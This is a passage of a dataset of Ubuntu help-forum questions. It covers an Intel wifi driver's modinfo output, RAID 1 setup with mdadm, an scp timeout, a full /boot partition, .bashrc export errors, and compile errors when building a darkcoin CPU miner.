v00008086d000008b2sv*sd0000c26abc*sc*i* alias : pci : v00008086d000008b2sv*sd0000c260bc*sc*i* alias : pci : v00008086d000008b2sv*sd0000c272bc*sc*i* alias : pci : v00008086d000008b2sv*sd0000c270bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c760bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c770bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c162bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c062bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c160bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c06abc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c060bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c170bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c072bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c070bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004420bc*sc*i* alias : pci : v00008086d000008b2sv*sd00004220bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000402abc*sc*i* alias : pci : v00008086d000008b1sv*sd00004020bc*sc*i* alias : pci : v00008086d000008b1sv*sd00005770bc*sc*i* alias : pci : v00008086d000008b1sv*sd00005170bc*sc*i* alias : pci : v00008086d000008b1sv*sd00005072bc*sc*i* alias : pci : v00008086d000008b1sv*sd00005070bc*sc*i* alias : pci : v00008086d000008b2sv*sd00004360bc*sc*i* alias : pci : v00008086d000008b2sv*sd00004370bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004560bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004570bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004a6cbc*sc*i* alias : pci : v00008086d000008b1sv*sd00004a6ebc*sc*i* alias : pci : v00008086d000008b1sv*sd00004a70bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000486ebc*sc*i* alias : pci : v00008086d000008b1sv*sd00004870bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004462bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000446abc*sc*i* alias : pci : v00008086d000008b1sv*sd00004460bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004472bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004470bc*sc*i* alias : pci : v00008086d000008b2sv*sd00004262bc*sc*i* alias : pci : v00008086d000008b2sv*sd0000426abc*sc*i* alias : pci : v00008086d000008b2sv*sd00004260bc*sc*i* alias : pci : v00008086d000008b2sv*sd00004272bc*sc*i* alias : pci : v00008086d000008b2sv*sd00004270bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004162bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004062bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004160bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000406abc*sc*i* alias : pci : v00008086d000008b1sv*sd00004060bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004170bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004072bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004070bc*sc*i* alias : pci : v00008086d00000892sv*sd00000462bc*sc*i* alias : pci : v00008086d00000893sv*sd00000262bc*sc*i* alias : pci : v00008086d00000892sv*sd00000062bc*sc*i* alias : pci : v00008086d00000894sv*sd00000822bc*sc*i* alias : pci : v00008086d00000894sv*sd00000422bc*sc*i* alias : pci : v00008086d00000895sv*sd00000222bc*sc*i* alias : pci : v00008086d00000894sv*sd00000022bc*sc*i* alias : pci : v00008086d0000088fsv*sd00005260bc*sc*i* alias : pci : v00008086d0000088esv*sd00004860bc*sc*i* alias : pci : v00008086d0000088esv*sd0000446abc*sc*i* alias : pci : v00008086d0000088esv*sd00004460bc*sc*i* alias : pci : v00008086d0000088fsv*sd0000426abc*sc*i* alias : pci : v00008086d0000088fsv*sd00004260bc*sc*i* alias : pci : v00008086d0000088esv*sd0000406abc*sc*i* alias : pci : v00008086d0000088esv*sd00004060bc*sc*i* alias : pci : v00008086d00000887sv*sd00004462bc*sc*i* alias : pci : v00008086d00000888sv*sd00004262bc*sc*i* alias : pci : v00008086d00000887sv*sd00004062bc*sc*i* alias : pci : v00008086d00000890sv*sd00004822bc*sc*i* alias : pci : v00008086d00000890sv*sd00004422bc*sc*i* alias : pci : v00008086d00000891sv*sd00004222bc*sc*i* alias : pci : v00008086d00000890sv*sd00004022bc*sc*i* alias : pci : v00008086d00000896sv*sd00005027bc*sc*i* alias : pci : v00008086d00000896sv*sd00005025bc*sc*i* alias : pci : v00008086d00000897sv*sd00005017bc*sc*i* alias : pci : v00008086d00000897sv*sd00005015bc*sc*i* alias : pci : v00008086d00000896sv*sd00005007bc*sc*i* alias : pci : v00008086d00000896sv*sd00005005bc*sc*i* alias : pci : v00008086d000008aesv*sd00001027bc*sc*i* alias : pci : v00008086d000008aesv*sd00001025bc*sc*i* alias : pci : v00008086d000008afsv*sd00001017bc*sc*i* alias : pci : v00008086d000008afsv*sd00001015bc*sc*i* alias : pci : v00008086d000008aesv*sd00001007bc*sc*i* alias : pci : v00008086d000008aesv*sd00001005bc*sc*i* alias : pci : v00008086d00000084sv*sd00001316bc*sc*i* alias : pci : v00008086d00000084sv*sd00001216bc*sc*i* alias : pci : v00008086d00000083sv*sd00001326bc*sc*i* alias : pci : v00008086d00000083sv*sd00001226bc*sc*i* alias : pci : v00008086d00000083sv*sd00001306bc*sc*i* alias : pci : v00008086d00000083sv*sd00001206bc*sc*i* alias : pci : v00008086d00000084sv*sd00001315bc*sc*i* alias : pci : v00008086d00000084sv*sd00001215bc*sc*i* alias : pci : v00008086d00000083sv*sd00001325bc*sc*i* alias : pci : v00008086d00000083sv*sd00001225bc*sc*i* alias : pci : v00008086d00000083sv*sd00001305bc*sc*i* alias : pci : v00008086d00000083sv*sd00001205bc*sc*i* alias : pci : v00008086d00000886sv*sd00001317bc*sc*i* alias : pci : v00008086d00000886sv*sd00001315bc*sc*i* alias : pci : v00008086d00000885sv*sd00001327bc*sc*i* alias : pci : v00008086d00000885sv*sd00001325bc*sc*i* alias : pci : v00008086d00000885sv*sd00001307bc*sc*i* alias : pci : v00008086d00000885sv*sd00001305bc*sc*i* alias : pci : v00008086d00000089sv*sd00001316bc*sc*i* alias : pci : v00008086d00000089sv*sd00001311bc*sc*i* alias : pci : v00008086d00000087sv*sd00001326bc*sc*i* alias : pci : v00008086d00000087sv*sd00001321bc*sc*i* alias : pci : v00008086d00000087sv*sd00001306bc*sc*i* alias : pci : v00008086d00000087sv*sd00001301bc*sc*i* alias : pci : v00008086d00000091sv*sd00005226bc*sc*i* alias : pci : v00008086d00000091sv*sd00005225bc*sc*i* alias : pci : v00008086d00000091sv*sd00005221bc*sc*i* alias : pci : v00008086d00000091sv*sd00005207bc*sc*i* alias : pci : v00008086d00000091sv*sd00005206bc*sc*i* alias : pci : v00008086d00000091sv*sd00005205bc*sc*i* alias : pci : v00008086d00000091sv*sd00005201bc*sc*i* alias : pci : v00008086d00000090sv*sd00005216bc*sc*i* alias : pci : v00008086d00000090sv*sd00005215bc*sc*i* alias : pci : v00008086d00000090sv*sd00005211bc*sc*i* alias : pci : v00008086d0000008bsv*sd00005317bc*sc*i* alias : pci : v00008086d0000008bsv*sd00005315bc*sc*i* alias : pci : v00008086d0000008asv*sd00005327bc*sc*i* alias : pci : v00008086d0000008asv*sd00005325bc*sc*i* alias : pci : v00008086d0000008asv*sd00005307bc*sc*i* alias : pci : v00008086d0000008asv*sd00005305bc*sc*i* alias : pci : v00008086d00000082sv*sd00001305bc*sc*i* alias : pci : v00008086d00000082sv*sd00001304bc*sc*i* alias : pci : v00008086d00000082sv*sd00004820bc*sc*i* alias : pci : v00008086d00000085sv*sd0000c228bc*sc*i* alias : pci : v00008086d00000085sv*sd0000c220bc*sc*i* alias : pci : v00008086d00000082sv*sd0000c020bc*sc*i* alias : pci : v00008086d00000085sv*sd00001316bc*sc*i* alias : pci : v00008086d00000085sv*sd00001318bc*sc*i* alias : pci : v00008086d00000085sv*sd00001311bc*sc*i* alias : pci : v00008086d00000082sv*sd00001328bc*sc*i* alias : pci : v00008086d00000082sv*sd00001326bc*sc*i* alias : pci : v00008086d00000082sv*sd00001321bc*sc*i* alias : pci : v00008086d00000082sv*sd00001308bc*sc*i* alias : pci : v00008086d00000082sv*sd00001307bc*sc*i* alias : pci : v00008086d00000082sv*sd00001306bc*sc*i* alias : pci : v00008086d00000082sv*sd00001301bc*sc*i* alias : pci : v00008086d00004239sv*sd00001316bc*sc*i* alias : pci : v00008086d00004239sv*sd00001311bc*sc*i* alias : pci : v00008086d00004238sv*sd00001118bc*sc*i* alias : pci : v00008086d00004238sv*sd00001111bc*sc*i* alias : pci : v00008086d0000422csv*sd00001326bc*sc*i* alias : pci : v00008086d0000422csv*sd00001321bc*sc*i* alias : pci : v00008086d0000422csv*sd00001307bc*sc*i* alias : pci : v00008086d0000422csv*sd00001306bc*sc*i* alias : pci : v00008086d0000422csv*sd00001301bc*sc*i* alias : pci : v00008086d0000422bsv*sd00001128bc*sc*i* alias : pci : v00008086d0000422bsv*sd00001121bc*sc*i* alias : pci : v00008086d0000422bsv*sd00001108bc*sc*i* alias : pci : v00008086d0000422bsv*sd00001101bc*sc*i* alias : pci : v00008086d0000423dsv*sd00001316bc*sc*i* alias : pci : v00008086d0000423dsv*sd00001216bc*sc*i* alias : pci : v00008086d0000423dsv*sd00001311bc*sc*i* alias : pci : v00008086d0000423dsv*sd00001211bc*sc*i* alias : pci : v00008086d0000423csv*sd00001326bc*sc*i* alias : pci : v00008086d0000423csv*sd00001321bc*sc*i* alias : pci : v00008086d0000423csv*sd00001221bc*sc*i* alias : pci : v00008086d0000423csv*sd00001306bc*sc*i* alias : pci : v00008086d0000423csv*sd00001206bc*sc*i* alias : pci : v00008086d0000423csv*sd00001301bc*sc*i* alias : pci : v00008086d0000423csv*sd00001201bc*sc*i* alias : pci : v00008086d0000423bsv*sd00001011bc*sc*i* alias : pci : v00008086d0000423asv*sd00001021bc*sc*i* alias : pci : v00008086d0000423asv*sd00001001bc*sc*i* alias : pci : v00008086d00004236sv*sd00001114bc*sc*i* alias : pci : v00008086d00004236sv*sd00001014bc*sc*i* alias : pci : v00008086d00004236sv*sd00001111bc*sc*i* alias : pci : v00008086d00004236sv*sd00001011bc*sc*i* alias : pci : v00008086d00004235sv*sd00001104bc*sc*i* alias : pci : v00008086d00004235sv*sd00001004bc*sc*i* alias : pci : v00008086d00004235sv*sd00001101bc*sc*i* alias : pci : v00008086d00004235sv*sd00001001bc*sc*i* alias : pci : v00008086d00004235sv*sd00001124bc*sc*i* alias : pci : v00008086d00004235sv*sd00001024bc*sc*i* alias : pci : v00008086d00004235sv*sd00001121bc*sc*i* alias : pci : v00008086d00004235sv*sd00001021bc*sc*i* alias : pci : v00008086d00004237sv*sd00001316bc*sc*i* alias : pci : v00008086d00004237sv*sd00001216bc*sc*i* alias : pci : v00008086d00004237sv*sd00001315bc*sc*i* alias : pci : v00008086d00004237sv*sd00001215bc*sc*i* alias : pci : v00008086d00004237sv*sd00001314bc*sc*i* alias : pci : v00008086d00004237sv*sd00001214bc*sc*i* alias : pci : v00008086d00004237sv*sd00001311bc*sc*i* alias : pci : v00008086d00004237sv*sd00001211bc*sc*i* alias : pci : v00008086d00004232sv*sd00001326bc*sc*i* alias : pci : v00008086d00004232sv*sd00001226bc*sc*i* alias : pci : v00008086d00004232sv*sd00001325bc*sc*i* alias : pci : v00008086d00004232sv*sd00001225bc*sc*i* alias : pci : v00008086d00004232sv*sd00001324bc*sc*i* alias : pci : v00008086d00004232sv*sd00001224bc*sc*i* alias : pci : v00008086d00004232sv*sd00001321bc*sc*i* alias : pci : v00008086d00004232sv*sd00001221bc*sc*i* alias : pci : v00008086d00004232sv*sd00001306bc*sc*i* alias : pci : v00008086d00004232sv*sd00001206bc*sc*i* alias : pci : v00008086d00004232sv*sd00001305bc*sc*i* alias : pci : v00008086d00004232sv*sd00001205bc*sc*i* alias : pci : v00008086d00004232sv*sd00001304bc*sc*i* alias : pci : v00008086d00004232sv*sd00001204bc*sc*i* alias : pci : v00008086d00004232sv*sd00001301bc*sc*i* alias : pci : v00008086d00004232sv*sd00001201bc*sc*i* depends : compat , cfg80211 vermagic : 3.8.0-38-generic smp mod_unload modversions parm : debug : debug output mask ( uint ) parm : swcrypto : using crypto in software ( default 0 [ hardware ] ) ( int ) parm : 11n_disable : disable 11n functionality , bitmap : 1 : full , 2 : disable agg tx , 4 : disable agg rx , 8 enable agg tx ( uint ) parm : amsdu_size_8k : enable 8k amsdu size ( default 0 ) ( int ) parm : fw_restart : restart firmware in case of error ( default true ) ( bool ) parm : antenna_coupling : specify antenna coupling in db ( defualt : 0 db ) ( int ) parm : wd_disable : disable stuck queue watchdog timer 0=system default , 1=disable ( default : 1 ) ( int ) parm : nvm_file : nvm file name ( charp ) parm : uapsd_disable : disable u-apsd functionality ( default : n ) ( bool ) parm : bt_coex_active : enable wifi/bt co-exist ( default : enable ) ( bool ) parm : led_mode:0=system default , 1=on ( rf on ) /off ( rf off ) , 2=blinking , 3=off ( default : 0 ) ( int ) parm : power_save : enable wifi power management ( default : disable ) ( bool ) parm : power_level : default power save level ( range from 1 - 5 , default : 1 ) ( int ) any advice would be appreciated . please let me know if i can provide any additional information as well .
493021	how do i set up raid 1 on only a portion of my hdds , post ubuntu 14.04 installation ?	i 'm trying to set up a mirrored ( raid 1 ) `` file cabinet '' consisting of the remainder of sda , after `` / '' and swap have been set up and ubuntu installed , plus the equal amount of gb space on sdb , amounting to a raid 1 on sda3 and sdb1 . in my opinion , mirroring is neither necessary nor desired for the rest of linux , since anything that corrupts my root/boot sector on the one hdd would just be duplicated on the other hdd ; all i need , and want , is a raid 1 `` file cabinet '' set up after the installation of ubuntu 14.04 . i do n't figure that there are many folk who have tried this , but i would be happily surprised if everyone has done it ! what i would like to know is the step by step syntax , in mdadm , for how to do this ( i have already downloaded/installed mdadm ) , in language that you 'd use to explain this - or anything else - to a noob , please ! thanks ! pathfinder : - ) tag-1 : groundbreaking tag-2 : outsidethebox tag-3 : notforpissants tag-4 : edgecity
493023	scp error in ubuntu 12.04	when i 'm connecting to server from my local desktop - it is connecting . when i 'm using scp over port 22 - have timeout . i 'm using following commands to connect via ssh : ssh -p 22 user1 @ 192.168.12.10 and it is connected and i can log in after that i want to copy the file from the server ip 192.168.12.10 : scp -p 22 /home/user1/desktop/1.txt user2 @ 192.168.12.10 : /home/user2/desktop her i 'm getting the following error ssh : connect to host 192.168.12.10 port 22 : connection timed out lost connection in ubuntu 10.04 everything works fine . i am getting problem for ubuntu 12.04 only . i can connect to server using ssh and i can not copy the file using scp . what is the problem ?
493027	how can i free up space in my /boot partition ?	my /boot partition is full . every time when i reboot i get the warning for that . here below is a list of the contents of /boot . /boot/grub /boot/lost+found /boot/abi-3.5.0-44-generic /boot/abi-3.5.0-45-generic /boot/abi-3.5.0-47-generic /boot/abi-3.5.0-48-generic /boot/abi-3.5.0-49-generic /boot/abi-3.5.0-51-generic /boot/abi-3.5.0-52-generic /boot/config-3.5.0-44-generic /boot/config-3.5.0-45-generic /boot/config-3.5.0-47-generic /boot/config-3.5.0-48-generic /boot/config-3.5.0-49-generic /boot/config-3.5.0-51-generic /boot/config-3.5.0-52-generic /boot/initrd.img-3.5.0-44-generic /boot/initrd.img-3.5.0-45-generic /boot/initrd.img-3.5.0-47-generic /boot/initrd.img-3.5.0-48-generic /boot/initrd.img-3.5.0-49-generic /boot/initrd.img-3.5.0-51-generic /boot/initrd.img-3.5.0-52-generic /boot/memtest86+.bin /boot/memtest86+_multiboot.bin /boot/system.map-3.5.0-44-generic /boot/system.map-3.5.0-45-generic /boot/system.map-3.5.0-47-generic /boot/system.map-3.5.0-48-generic /boot/system.map-3.5.0-49-generic /boot/system.map-3.5.0-51-generic /boot/system.map-3.5.0-52-generic /boot/vmlinuz-3.5.0-44-generic /boot/vmlinuz-3.5.0-45-generic /boot/vmlinuz-3.5.0-47-generic /boot/vmlinuz-3.5.0-48-generic /boot/vmlinuz-3.5.0-49-generic /boot/vmlinuz-3.5.0-51-generic /boot/vmlinuz-3.5.0-52-generic please help .
493029	error message in terminal on startup	as soon as i startup the terminal ( ubuntu 12.04 lts ) , i get the error message : bash : export : `/lib/perl5/site_perl/5.14.2/ ' : not a valid identifier i am not really familiar with linux yet . how do i rectify this ? edit : if [ -f /etc/bash_completion ] & & ! shopt -oq posix ; then . /etc/bash_completion fi export path= $ path/usr/lib/lightdm/lightdm/usr/local/sbin/usr/local/bin/usr/sbin $ export path=/usr/lib/lightdm/lightdm/usr/local/sbin/usr/local/bin/usr/sbin/usr/ $ export path= $ path : /home/lib-11/downloads/randfold-2.0/randfold export perl5lib=perl5lib : /home/lib-11/downloads/mirdeep2 /lib/perl5/site_perl/5 $ export path= $ path : /home/lib-11/downloads/mirdeep2 mirdeep2 and randfold are executables that i wanted to run .
493030	how to install a 'patch ' program ?	i am unable to install patch program . it is showing : unable to locate packages . also the folder etc/apt/sources.list is showing main restricted how to overcome this ?
493032	how can i reset an xubuntu session ?	everytime time i boot and login into my xubuntu 14.10 , skype , thunderbird and firefox start up even though i closed them before i logged out and shut down . these programs are not in the list of autostart programs . so how can i reset the session ?
493034	bash function oblivion	i 'm fairly new to linux , as many of you may have noticed . what i speak particularly is adding personal , user-generated functions and alias in my .bashrc file . i 'm not exactly sure how bash works but according to many posts i `` add it to the end of my .bashrc file . '' which does not work when the command is executed through the terminal .
493038	error compiling the darkcoin miner based on pooler 's cpu miner	i was trying to compile the darkcoin miner 32 bit from source which is based on pooler 's cpu miner.link here . i am on a xubuntu 10.04 32 bit . when i run make after running the following commands ( as specified by the readme , all as super user ) : - ./autogen.sh ./configure cflags= '' -o3 '' i get the following output : - make all-recursive make [ 1 ] : entering directory /home/user/downloads/darkcoin-cpuminer-1.2c-master' making all in compat make [ 2 ] : entering directory/home/user/downloads/darkcoin-cpuminer-1.2c-master/compat' make [ 3 ] : entering directory /home/user/downloads/darkcoin-cpuminer-1.2c-master/compat' make [ 3 ] : nothing to be done forall-am ' . make [ 3 ] : leaving directory /home/user/downloads/darkcoin-cpuminer-1.2c-master/compat' make [ 2 ] : leaving directory/home/user/downloads/darkcoin-cpuminer-1.2c-master/compat' make [ 2 ] : entering directory /home/user/downloads/darkcoin-cpuminer-1.2c-master' gcc -std=gnu99 -dhave_config_h -i . -pthread -fno-strict-aliasing -o3 -mt minerd-luffa_for_sse2.o -md -mp -mf .deps/minerd-luffa_for_sse2.tpo -c -o minerd-luffa_for_sse2.otest -f 'x5/luffa_for_sse2.c ' || echo './'x5/luffa_for_sse2.c in file included from x5/luffa_for_sse2.c:22 : /usr/lib/gcc/i486-linux-gnu/4.4.3/include/emmintrin.h:32:3 : error : # error `` sse2 instruction set not enabled '' in file included from x5/luffa_for_sse2.h:22 , from x5/luffa_for_sse2.c:23 : x5/defs_x5.h:15 : error : expected specifier-qualifier-list before ‘__m128i’ x5/luffa_for_sse2.c:271 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘cns128’ x5/luffa_for_sse2.c:272 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘allone’ x5/luffa_for_sse2.c:273 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘mask’ x5/luffa_for_sse2.c : in function ‘init_luffa’ : x5/luffa_for_sse2.c:300 : error : ‘hashstate’ has no member named ‘hashbitlen’ x5/luffa_for_sse2.c:303 : error : ‘mask’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:303 : error : ( each undeclared identifier is reported only once x5/luffa_for_sse2.c:303 : error : for each function it appears in . ) x5/luffa_for_sse2.c:303 : warning : implicit declaration of function ‘_mm_set_epi32’ x5/luffa_for_sse2.c:306 : error : ‘allone’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:310 : error : ‘cns128’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:310 : warning : implicit declaration of function ‘_mm_loadu_si128’ x5/luffa_for_sse2.c:310 : error : ‘__m128i’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:310 : error : expected expression before ‘ ) ’ token x5/luffa_for_sse2.c:316 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:316 : error : expected expression before ‘ ) ’ token x5/luffa_for_sse2.c:322 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:322 : error : expected expression before ‘ ) ’ token x5/luffa_for_sse2.c:328 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:328 : error : expected expression before ‘ ) ’ token x5/luffa_for_sse2.c:334 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:334 : error : expected expression before ‘ ) ’ token x5/luffa_for_sse2.c:342 : error : ‘hashstate’ has no member named ‘bitlen’ x5/luffa_for_sse2.c:343 : error : ‘hashstate’ has no member named ‘bitlen’ x5/luffa_for_sse2.c:344 : error : ‘hashstate’ has no member named ‘rembitlen’ x5/luffa_for_sse2.c : in function ‘update_luffa’ : x5/luffa_for_sse2.c:357 : error : ‘hashstate’ has no member named ‘hashbitlen’ x5/luffa_for_sse2.c : in function ‘update256’ : x5/luffa_for_sse2.c:383 : error : ‘hashstate’ has no member named ‘bitlen’ x5/luffa_for_sse2.c:385 : error : ‘hashstate’ has no member named ‘rembitlen’ x5/luffa_for_sse2.c:386 : error : ‘hashstate’ has no member named ‘rembitlen’ x5/luffa_for_sse2.c:388 : error : ‘hashstate’ has no member named ‘rembitlen’ x5/luffa_for_sse2.c:394 : error : ‘hashstate’ has no member named ‘rembitlen’ x5/luffa_for_sse2.c:403 : error : ‘hashstate’ has no member named ‘rembitlen’ x5/luffa_for_sse2.c:425 : error : ‘hashstate’ has no member named ‘rembitlen’ x5/luffa_for_sse2.c:427 : error : ‘hashstate’ has no member named ‘rembitlen’ x5/luffa_for_sse2.c : in function ‘update384’ : x5/luffa_for_sse2.c:440 : error : ‘hashstate’ has no member named ‘bitlen’ x5/luffa_for_sse2.c:441 : error : ‘hashstate’ has no member named ‘bitlen’ x5/luffa_for_sse2.c:444 : error : ‘hashstate’ has no member named ‘rembitlen’ x5/luffa_for_sse2.c:445 : error : ‘hashstate’ has no member named ‘rembitlen’ x5/luffa_for_sse2.c:447 : error : ‘hashstate’ has no member named ‘rembitlen’ x5/luffa_for_sse2.c:453 : error : ‘hashstate’ has no member named ‘rembitlen’ x5/luffa_for_sse2.c:462 : error : ‘hashstate’ has no member named ‘rembitlen’ x5/luffa_for_sse2.c:484 : error : ‘hashstate’ has no member named ‘rembitlen’ x5/luffa_for_sse2.c:486 : error : ‘hashstate’ has no member named ‘rembitlen’ x5/luffa_for_sse2.c : in function ‘update512’ : x5/luffa_for_sse2.c:499 : error : ‘hashstate’ has no member named ‘bitlen’ x5/luffa_for_sse2.c:500 : error : ‘hashstate’ has no member named ‘bitlen’ x5/luffa_for_sse2.c:503 : error : ‘hashstate’ has no member named ‘rembitlen’ x5/luffa_for_sse2.c:504 : error : ‘hashstate’ has no member named ‘rembitlen’ x5/luffa_for_sse2.c:506 : error : ‘hashstate’ has no member named ‘rembitlen’ x5/luffa_for_sse2.c:512 : error : ‘hashstate’ has no member named ‘rembitlen’ x5/luffa_for_sse2.c:521 : error : ‘hashstate’ has no member named ‘rembitlen’ x5/luffa_for_sse2.c:543 : error : ‘hashstate’ has no member named ‘rembitlen’ x5/luffa_for_sse2.c:545 : error : ‘hashstate’ has no member named ‘rembitlen’ x5/luffa_for_sse2.c : in function ‘final_luffa’ : x5/luffa_for_sse2.c:555 : error : ‘hashstate’ has no member named ‘hashbitlen’ x5/luffa_for_sse2.c : in function ‘rnd256’ : x5/luffa_for_sse2.c:590 : error : ‘__m128i’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:590 : error : expected ‘ ; ’ before ‘t’ x5/luffa_for_sse2.c:591 : error : expected ‘ ; ’ before ‘chainv’ x5/luffa_for_sse2.c:592 : error : expected ‘ ; ’ before ‘x’ x5/luffa_for_sse2.c:593 : error : expected ‘ ; ’ before ‘msg’ x5/luffa_for_sse2.c:594 : error : expected ‘ ; ’ before ‘tmp’ x5/luffa_for_sse2.c:597 : error : ‘chainv’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:597 : warning : implicit declaration of function ‘_mm_load_si128’ x5/luffa_for_sse2.c:597 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:598 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:599 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:600 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:601 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:602 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:604 : error : ‘t’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:606 : warning : implicit declaration of function ‘_mm_xor_si128’ x5/luffa_for_sse2.c:611 : error : ‘tmp’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:611 : warning : implicit declaration of function ‘_mm_and_si128’ x5/luffa_for_sse2.c:611 : error : ‘mask’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:611 : warning : implicit declaration of function ‘_mm_shuffle_epi32’ x5/luffa_for_sse2.c:611 : warning : implicit declaration of function ‘_mm_srli_si128’ x5/luffa_for_sse2.c:611 : warning : implicit declaration of function ‘_mm_slli_si128’ x5/luffa_for_sse2.c:611 : warning : implicit declaration of function ‘_mm_or_si128’ x5/luffa_for_sse2.c:613 : error : ‘msg’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:613 : error : expected expression before ‘ ) ’ token x5/luffa_for_sse2.c:614 : error : expected expression before ‘ ) ’ token x5/luffa_for_sse2.c:629 : warning : implicit declaration of function ‘_mm_slli_epi32’ x5/luffa_for_sse2.c:630 : warning : implicit declaration of function ‘_mm_srli_epi32’ x5/luffa_for_sse2.c:636 : error : ‘x’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:636 : warning : implicit declaration of function ‘_mm_unpacklo_epi32’ x5/luffa_for_sse2.c:636 : warning : implicit declaration of function ‘_mm_unpackhi_epi32’ x5/luffa_for_sse2.c:636 : warning : implicit declaration of function ‘_mm_unpacklo_epi64’ x5/luffa_for_sse2.c:636 : warning : implicit declaration of function ‘_mm_unpackhi_epi64’ x5/luffa_for_sse2.c:640 : warning : implicit declaration of function ‘_mm_andnot_si128’ x5/luffa_for_sse2.c:640 : error : ‘allone’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:640 : error : ‘cns128’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:646 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:647 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:648 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:649 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:650 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:651 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c : in function ‘rnd384’ : x5/luffa_for_sse2.c:658 : error : ‘__m128i’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:658 : error : expected ‘ ; ’ before ‘t’ x5/luffa_for_sse2.c:659 : error : expected ‘ ; ’ before ‘chainv’ x5/luffa_for_sse2.c:660 : error : expected ‘ ; ’ before ‘msg’ x5/luffa_for_sse2.c:661 : error : expected ‘ ; ’ before ‘tmp’ x5/luffa_for_sse2.c:662 : error : expected ‘ ; ’ before ‘x’ x5/luffa_for_sse2.c:665 : error : ‘chainv’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:665 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:666 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:667 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:668 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:669 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:670 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:671 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:672 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:674 : error : ‘t’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:683 : error : ‘tmp’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:683 : error : ‘mask’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:685 : error : ‘msg’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:685 : error : expected expression before ‘ ) ’ token x5/luffa_for_sse2.c:686 : error : expected expression before ‘ ) ’ token x5/luffa_for_sse2.c:732 : error : ‘x’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:736 : error : ‘allone’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:736 : error : ‘cns128’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:742 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:743 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:744 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:745 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:746 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:747 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:748 : error : ‘hashstate’ has no member named ‘chainv’ 